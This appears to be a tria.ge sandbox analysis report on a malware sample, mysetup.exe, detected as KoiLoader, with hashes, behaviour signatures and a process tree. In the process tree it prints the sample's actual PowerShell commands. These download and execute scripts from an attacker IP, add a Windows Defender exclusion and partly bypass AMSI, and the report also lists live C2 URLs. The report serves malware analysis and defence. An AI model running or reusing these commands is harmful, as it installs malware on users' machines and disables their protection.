Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
139s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29/11/2024, 22:31
Static task
static1
Behavioral task
behavioral1
Sample
mysetup.exe
Resource
win7-20240903-en
General
-
Target
mysetup.exe
-
Size
2.2MB
-
MD5
5cb042f9877f5876a19c86ded15fb1f8
-
SHA1
12249b4e9e8f5a3d66259d9172f8b6d4225812ab
-
SHA256
e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819
-
SHA512
f6c4c9198de1d3a18815db38e50f36f7f73103a050f07c73ad83e05371a7a13be985a84c437ce27a74638d96fffda1eb860fa3b7923e47d020a3912cecd3f490
-
SSDEEP
49152:FBuZrEUcH4ytTJpIbxrvfqKIy029s4C1eH9K:jkLcH4ytItfgt29s4C1eH9K
Malware Config
Extracted
http://79.124.78.109/wp-includes/phyllopodan7V7GD.php
http://79.124.78.109/wp-includes/barasinghaby.ps1
Extracted
koiloader
http://79.124.78.109/flocking.php
Signatures
-
Koiloader family
-
Detects KoiLoader payload 1 IoCs
resource yara_rule behavioral2/memory/2388-53-0x0000000007F00000-0x0000000007F0D000-memory.dmp family_koi_loader -
Blocklisted process makes network request 6 IoCs
flow pid Process 7 1028 powershell.exe 19 2388 powershell.exe 20 2388 powershell.exe 22 2600 powershell.exe 43 2388 powershell.exe 48 2388 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4452 powershell.exe 1028 powershell.exe 2600 powershell.exe 2388 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 4380 mysetup.tmp -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mysetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mysetup.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1028 powershell.exe 1028 powershell.exe 2388 powershell.exe 2388 powershell.exe 4452 powershell.exe 4452 powershell.exe 2600 powershell.exe 2600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1028 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 4452 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1368 wrote to memory of 4380 1368 mysetup.exe 82 PID 1368 wrote to memory of 4380 1368 mysetup.exe 82 PID 1368 wrote to memory of 4380 1368 mysetup.exe 82 PID 4380 wrote to memory of 1028 4380 mysetup.tmp 83 PID 4380 wrote to memory of 1028 4380 mysetup.tmp 83 PID 1028 wrote to memory of 3968 1028 powershell.exe 85 PID 1028 wrote to memory of 3968 1028 powershell.exe 85 PID 3968 wrote to memory of 2388 3968 wscript.exe 87 PID 3968 wrote to memory of 2388 3968 wscript.exe 87 PID 3968 wrote to memory of 2388 3968 wscript.exe 87 PID 4624 wrote to memory of 4408 4624 DllHost.exe 92 PID 4624 wrote to memory of 4408 4624 DllHost.exe 92 PID 4624 wrote to memory of 4408 4624 DllHost.exe 92 PID 4408 wrote to memory of 4452 4408 cmd.exe 94 PID 4408 wrote to memory of 4452 4408 cmd.exe 94 PID 4408 wrote to memory of 4452 4408 cmd.exe 94 PID 2388 wrote to memory of 212 2388 powershell.exe 96 PID 2388 wrote to memory of 212 2388 powershell.exe 96 PID 2388 wrote to memory of 212 2388 powershell.exe 96 PID 212 wrote to memory of 2600 212 cmd.exe 98 PID 212 wrote to memory of 2600 212 cmd.exe 98 PID 212 wrote to memory of 2600 212 cmd.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\mysetup.exe"C:\Users\Admin\AppData\Local\Temp\mysetup.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Users\Admin\AppData\Local\Temp\is-1AMH5.tmp\mysetup.tmp"C:\Users\Admin\AppData\Local\Temp\is-1AMH5.tmp\mysetup.tmp" /SL5="$A0064,1414311,832512,C:\Users\Admin\AppData\Local\Temp\mysetup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -command IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\vqPM0l4stR.js'); wscript ($env:temp+'\vqPM0l4stR.js');3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'http://79.124.78.109/wp-includes/phyllopodan7V7GD.php'; $l2 = 'http://79.124.78.109/wp-includes/barasinghaby.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zTIN7KN9FPZ'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\ra63d6fdc-08cb-4232-ab51-76cafdcb4d96r.js"1⤵PID:2972
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\ra63d6fdc-08cb-4232-ab51-76cafdcb4d96r.js"1⤵PID:3784
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
19KB
MD5a4c64db4b6e427a4e58656d764d68010
SHA14867034075915f4c342bb83e6afa7b08c3049da6
SHA256d2ecc00be94d4e35b55383043fad2176e41272a85678ea452d6119e9982e15f7
SHA51266a698a3e0ae44e7cb8ed34f298e23dedabda48baa275e41f29d23a641aca04b197f69b7d62b6a7bcf591f8ce27aa467853ce432681d968cae78054d7c1dd684
-
Filesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.1MB
MD575ff4b69506691689c816c05782e97e7
SHA1232ca459d1a83d8794ee30c96422a77739a57ad4
SHA256f5416883c1a43a0b96e48c1da17d38c586f8d6a9b7d9978845e119df4c98f76f
SHA5123c0e0d41d899f19933aabc0a8f86ce9b9c4d1ea6bdac74f07ee95792be6bcbb7b9b4ce0c2fe148024077a28287b742971ad788f5c08b3e90d47099e1664b06bc
-
Filesize
1KB
MD570e7b9c621b788d2da048d31db40c24d
SHA167a0f2de1e535eb72d1df05579f628e29e0a2fcf
SHA256854d48b8a145769476dcb979852100645c0567d5f8d85d5a61c496a39c14bffe
SHA5127c397fe63f460d812f9be731a549eef082fb8c34d05a9481d38f42546633f03fce5b921163c4e4ecc17ac351aae55eee0362822c6eb12684fff99455e162857e